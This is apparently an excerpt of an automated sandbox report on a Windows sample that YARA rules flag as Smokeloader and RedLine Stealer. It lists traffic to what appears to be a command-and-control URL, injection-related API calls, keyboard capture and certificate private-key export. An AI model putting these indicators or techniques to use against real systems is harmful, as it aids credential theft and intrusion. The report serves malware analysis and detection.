request.</p><hr></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 21:29:17 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 21:29:23 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 21:29:31 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 21:29:43 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 21:29:54 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 21:30:11 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 21:30:32 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 21:30:45 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                  Source: explorer.exe, 00000002.00000000.2095504231.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2095504231.0000000009B0B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                  Source: explorer.exe, 00000002.00000000.2091336304.0000000000F13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.v
                  Source: explorer.exe, 00000002.00000000.2095504231.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2095504231.0000000009B0B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                  Source: explorer.exe, 00000002.00000000.2095504231.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2095504231.0000000009B0B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                  Source: explorer.exe, 00000002.00000000.2095504231.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2095504231.0000000009B0B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                  Source: explorer.exe, 00000002.00000000.2095504231.00000000099C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
                  Source: explorer.exe, 00000002.00000000.2094847936.0000000008890000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2094289006.0000000007DC0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2094815551.0000000008870000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
                  Source: explorer.exe, 00000002.00000000.2098614034.000000000C8D3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
                  Source: explorer.exe, 0000000A.00000003.3127681081.000000000303F000.00000004.00000020.00020000.00000000.sdmp, AB18.tmp.10.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                  Source: explorer.exe, 00000002.00000000.2097959116.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
                  Source: explorer.exe, 00000002.00000000.2093454201.00000000076F8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
                  Source: explorer.exe, 00000002.00000000.2095504231.0000000009ADB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
                  Source: explorer.exe, 00000002.00000000.2093454201.0000000007637000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
                  Source: explorer.exe, 00000002.00000000.2092180745.00000000035FA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.coml
                  Source: explorer.exe, 0000000A.00000002.3153296640.0000000003042000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3153296640.0000000002FD7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3153296640.0000000003059000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://calvinandhalls.com/
                  Source: explorer.exe, 0000000A.00000002.3153296640.0000000002FD7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://calvinandhalls.com/;
                  Source: explorer.exe, 0000000A.00000002.3153296640.0000000003042000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://calvinandhalls.com/application/x-www-form-urlencodedMozilla/5.0
                  Source: explorer.exe, 0000000A.00000002.3153296640.000000000302B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://calvinandhalls.com/earch.php
                  Source: explorer.exe, 0000000A.00000002.3153296640.0000000002FD7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.3103492810.0000000000E00000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4488375933.0000000000657000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.4487737698.0000000000939000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.4487808620.0000000003337000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.4487806601.0000000001419000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://calvinandhalls.com/search.php
                  Source: explorer.exe, 0000000A.00000002.3153296640.0000000003000000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://calvinandhalls.com/search.php8
                  Source: explorer.exe, 0000000A.00000002.3153296640.0000000002FD7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.3103492810.0000000000E00000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4488375933.0000000000657000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.4487737698.0000000000939000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.4487808620.0000000003337000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.4487806601.0000000001419000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://calvinandhalls.com/search.phpMozilla/5.0
                  Source: explorer.exe, 0000000A.00000003.3127681081.000000000303F000.00000004.00000020.00020000.00000000.sdmp, AB18.tmp.10.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: explorer.exe, 0000000A.00000003.3127681081.000000000303F000.00000004.00000020.00020000.00000000.sdmp, AB18.tmp.10.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                  Source: explorer.exe, 0000000A.00000003.3127681081.000000000303F000.00000004.00000020.00020000.00000000.sdmp, AB18.tmp.10.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                  Source: explorer.exe, 0000000A.00000003.3127681081.000000000303F000.00000004.00000020.00020000.00000000.sdmp, AB18.tmp.10.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: explorer.exe, 0000000A.00000003.3127681081.000000000303F000.00000004.00000020.00020000.00000000.sdmp, AB18.tmp.10.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                  Source: explorer.exe, 0000000A.00000003.3127681081.000000000303F000.00000004.00000020.00020000.00000000.sdmp, AB18.tmp.10.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: explorer.exe, 00000002.00000000.2095504231.0000000009B41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
                  Source: explorer.exe, 00000002.00000000.2095504231.0000000009B41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com
                  Source: explorer.exe, 00000002.00000000.2097959116.000000000C460000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comcember
                  Source: explorer.exe, 00000002.00000000.2095504231.00000000099C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/)s
                  Source: explorer.exe, 00000002.00000000.2095504231.00000000099C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.comon
                  Source: explorer.exe, 0000000A.00000003.3127681081.000000000303F000.00000004.00000020.00020000.00000000.sdmp, AB18.tmp.10.drString found in binary or memory: https://www.ecosia.org/newtab/
                  Source: explorer.exe, 0000000A.00000003.3127681081.000000000303F000.00000004.00000020.00020000.00000000.sdmp, AB18.tmp.10.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50013 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50018
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50017
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50019
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50009 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50011 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50017 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50007 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50015 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50010
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50019 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50031
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50012
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50011
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50033
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50014
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50013
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50016
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50015
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50005 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50031 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50007
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50029
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50006
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50009
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50008
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50010 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50016 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50008 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50033 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50021
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50018 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50020 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50020
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50005
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50027
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50000 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50027 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50021 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50029 -> 443
                  Source: unknownHTTPS traffic detected: 23.145.40.164:443 -> 192.168.2.5:50000 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:50004 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:50005 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:50006 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:50007 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:50008 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:50009 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:50010 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:50011 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:50012 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:50013 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:50014 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:50015 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:50016 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:50017 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:50018 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:50019 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:50020 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:50021 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:50027 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:50029 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:50031 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:50033 version: TLS 1.2

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  barindex
                  Source: Yara matchFile source: 00000010.00000002.4486772603.00000000008C1000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.4486975277.0000000000191000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 2180, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 4444, type: MEMORYSTR
                  Source: Yara matchFile source: 6.2.3E40.exe.560e67.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.dghchav.5e0e67.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.3.dghchav.5f0000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.3E40.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.3.3E40.exe.600000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.dghchav.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000006.00000003.2684210393.0000000000600000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2114850031.0000000002370000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.2735276469.0000000000600000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000003.2931576265.00000000005F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.2982873164.00000000005F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.2983352319.00000000020E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.2340094122.00000000020B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2114892541.0000000002391000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.2340140325.00000000020D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.2735334108.0000000000621000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 18_2_02FE162B GetKeyboardState,ToUnicode,18_2_02FE162B
                  Source: C:\Users\user\AppData\Local\Temp\FDDB.exeCode function: 8_2_00007FF6DFE23220 CertGetCertificateContextProperty,CryptAcquireCertificatePrivateKey,CryptGetUserKey,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,CryptExportKey,VirtualProtect,VirtualProtect,CryptAcquireContextA,CryptImportKey,OpenSCManagerA,OpenServiceA,QueryServiceStatusEx,OpenProcess,ReadProcessMemory,ReadProcessMemory,WriteProcessMemory,NCryptExportKey,CertOpenStore,CertAddCertificateLinkToStore,CertSetCertificateContextProperty,PFXExportCertStoreEx,PFXExportCertStoreEx,8_2_00007FF6DFE23220

                  System Summary

                  barindex
                  Source: 00000000.00000002.2114850031.0000000002370000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                  Source: 00000006.00000002.2735276469.0000000000600000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                  Source: 00000004.00000002.2340049741.0000000002090000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: 00000000.00000002.2114641854.000000000060F000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 00000004.00000002.2339931516.00000000005CD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 00000006.00000002.2735456331.00000000006AD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 00000006.00000002.2735166251.0000000000560000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: 00000007.00000002.2982873164.00000000005F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                  Source: 00000007.00000002.2983352319.00000000020E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                  Source: 00000007.00000002.2982835885.00000000005E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: 00000004.00000002.2340094122.00000000020B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                  Source: 00000000.00000002.2114759693.0000000002090000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: 00000000.00000002.2114892541.0000000002391000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                  Source: 00000004.00000002.2340140325.00000000020D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                  Source: 00000007.00000002.2983174460.000000000075D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 00000006.00000002.2735334108.0000000000621000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                  Source: C:\Windows\explorer.exeProcess Stats: CPU usage > 49%
                  Source: C:\Users\user\Desktop\9VgIkx4su0.exeCode function: 0_2_00401514 LocalAlloc,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401514
                  Source: C:\Users\user\Desktop\9VgIkx4su0.exeCode function: 0_2_00402F97 RtlCreateUserThread,NtTerminateProcess,0_2_00402F97
                  Source: C:\Users\user\Desktop\9VgIkx4su0.exeCode function: 0_2_00401542 LocalAlloc,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401542
                  Source: C:\Users\user\Desktop\9VgIkx4su0.exeCode function: 0_2_00403247 NtTerminateProcess,GetModuleHandleA,0_2_00403247
                  Source: C:\Users\user\Desktop\9VgIkx4su0.exeCode function: 0_2_00401549 LocalAlloc,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401549
                  Source: C:\Users\user\Desktop\9VgIkx4su0.exeCode function: 0_2_0040324F NtTerminateProcess,GetModuleHandleA,0_2_0040324F
                  Source: C:\Users\user\Desktop\9VgIkx4su0.exeCode function: 0_2_00403256 NtTerminateProcess,GetModuleHandleA,0_2_00403256
                  Source: C:\Users\user\Desktop\9VgIkx4su0.exeCode function: 0_2_00401557 LocalAlloc,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401557
                  Source: C:\Users\user\Desktop\9VgIkx4su0.exeCode function: 0_2_0040326C NtTerminateProcess,GetModuleHandleA,0_2_0040326C
                  Source: C:\Users\user\Desktop\9VgIkx4su0.exeCode function: 0_2_00403277 NtTerminateProcess,GetModuleHandleA,NtMapViewOfSection,NtDuplicateObject,NtQuerySystemInformation,NtOpenKey,strstr,tolower,towlower,0_2_00403277
                  Source: C:\Users\user\Desktop\9VgIkx4su0.exeCode function: 0_2_004014FE LocalAlloc,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_004014FE
                  Source: C:\Users\user\Desktop\9VgIkx4su0.exeCode function: 0_2_00403290 NtTerminateProcess,GetModuleHandleA,0_2_00403290
                  Source: C:\Users\user\AppData\Roaming\eihchavCode function: 4_2_00401514 LocalAlloc,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_00401514
                  Source: C:\Users\user\AppData\Roaming\eihchavCode function: 4_2_00402F97 RtlCreateUserThread,NtTerminateProcess,4_2_00402F97
                  Source: C:\Users\user\AppData\Roaming\eihchavCode function: 4_2_00401542 LocalAlloc,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_00401542
                  Source: C:\Users\user\AppData\Roaming\eihchavCode function: 4_2_00403247 NtTerminateProcess,GetModuleHandleA,4_2_00403247
                  Source: C:\Users\user\AppData\Roaming\eihchavCode function: 4_2_00401549 LocalAlloc,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_00401549
                  Source: C:\Users\user\AppData\Roaming\eihchavCode function: 4_2_0040324F NtTerminateProcess,GetModuleHandleA,4_2_0040324F
                  Source: C:\Users\user\AppData\Roaming\eihchavCode function: 4_2_00403256 NtTerminateProcess,GetModuleHandleA,4_2_00403256
                  Source: C:\Users\user\AppData\Roaming\eihchavCode function: 4_2_00401557 LocalAlloc,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_00401557
                  Source: C:\Users\user\AppData\Roaming\eihchavCode function: 4_2_0040326C NtTerminateProcess,GetModuleHandleA,4_2_0040326C
                  Source: C:\Users\user\AppData\Roaming\eihchavCode function: 4_2_00403277 NtTerminateProcess,GetModuleHandleA,4_2_00403277
                  Source: C:\Users\user\AppData\Roaming\eihchavCode function: 4_2_004014FE LocalAlloc,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_004014FE
                  Source: C:\Users\user\AppData\Roaming\eihchavCode function: 4_2_00403290 NtTerminateProcess,GetModuleHandleA,4_2_00403290
                  Source: C:\Users\user\AppData\Local\Temp\3E40.exeCode function: 6_2_00403043 RtlCreateUserThread,NtTerminateProcess,6_2_00403043
                  Source: C:\Users\user\AppData\Local\Temp\3E40.exeCode function: 6_2_004014C4 NtAllocateVirtualMemory,VirtualProtect,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,6_2_004014C4
                  Source: C:\Users\user\AppData\Local\Temp\3E40.exeCode function: 6_2_00401508 NtAllocateVirtualMemory,6_2_00401508
                  Source: C:\Users\user\AppData\Local\Temp\3E40.exeCode function: 6_2_004014CF NtAllocateVirtualMemory,6_2_004014CF
                  Source: C:\Users\user\AppData\Local\Temp\3E40.exeCode function: 6_2_004015D5 VirtualProtect,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,6_2_004015D5
                  Source: C:\Users\user\AppData\Local\Temp\3E40.exeCode function: 6_2_004014DE NtAllocateVirtualMemory,6_2_004014DE
                  Source: C:\Users\user\AppData\Local\Temp\3E40.exeCode function: 6_2_004015DF VirtualProtect,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,6_2_004015DF
                  Source: C:\Users\user\AppData\Local\Temp\3E40.exeCode function: 6_2_004015E6 VirtualProtect,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,6_2_004015E6
                  Source: C:\Users\user\AppData\Local\Temp\3E40.exeCode function: 6_2_004015F2 VirtualProtect,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,6_2_004015F2
                  Source: C:\Users\user\AppData\Local\Temp\3E40.exeCode function: 6_2_004014F5 NtAllocateVirtualMemory,6_2_004014F5
                  Source: C:\Users\user\AppData\Local\Temp\3E40.exeCode function: 6_2_004014F8 NtAllocateVirtualMemory,6_2_004014F8
                  Source: C:\Users\user\AppData\Local\Temp\3E40.exeCode function: 6_2_004014FB NtAllocateVirtualMemory,6_2_004014FB
                  Source: C:\Users\user\AppData\Roaming\dghchavCode function: 7_2_00403043 RtlCreateUserThread,NtTerminateProcess,7_2_00403043
                  Source: C:\Users\user\AppData\Roaming\dghchavCode function: 7_2_004014C4 NtAllocateVirtualMemory,VirtualProtect,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,7_2_004014C4
                  Source: C:\Users\user\AppData\Roaming\dghchavCode function: 7_2_00401508 NtAllocateVirtualMemory,7_2_00401508
                  Source: C:\Users\user\AppData\Roaming\dghchavCode function: 7_2_004014CF NtAllocateVirtualMemory,7_2_004014CF
                  Source: C:\Users\user\AppData\Roaming\dghchavCode function: 7_2_004015D5 VirtualProtect,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,7_2_004015D5
                  Source: C:\Users\user\AppData\Roaming\dghchavCode function: 7_2_004014DE NtAllocateVirtualMemory,7_2_004014DE
